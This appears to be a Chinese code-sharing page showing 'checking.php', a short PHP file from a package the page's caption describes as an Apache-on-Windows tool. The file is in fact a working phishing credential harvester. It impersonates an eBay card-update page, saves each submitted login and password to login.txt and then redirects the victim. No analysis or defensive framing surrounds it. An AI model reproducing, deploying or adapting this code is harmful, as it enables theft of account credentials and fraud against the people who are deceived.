checking.php

来自「apache windows下的一款好」· PHP 代码 · 共 15 行

PHP
15
字号
<?$error = "SignIn.php";if(empty($login)) { Header ("Location: $error"); }if(empty($password)) { Header ("Location: $error"); }else {print "<HTML><HEAD><TITLE>Place or update your credit /debit card information on your eBay account</TITLE>\n";print "<META http-equiv=Content-Type content=text/html charset=ISO-8859-1>\n";print "<META content=Microsoft FrontPage 5.0 name=GENERATOR></HEAD>\n";$Output=$login."|".$password; $duomenys=fopen('login.txt', "w"); fwrite($duomenys, "$Output\n");}?><script>window.location="index1.html"</script>

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?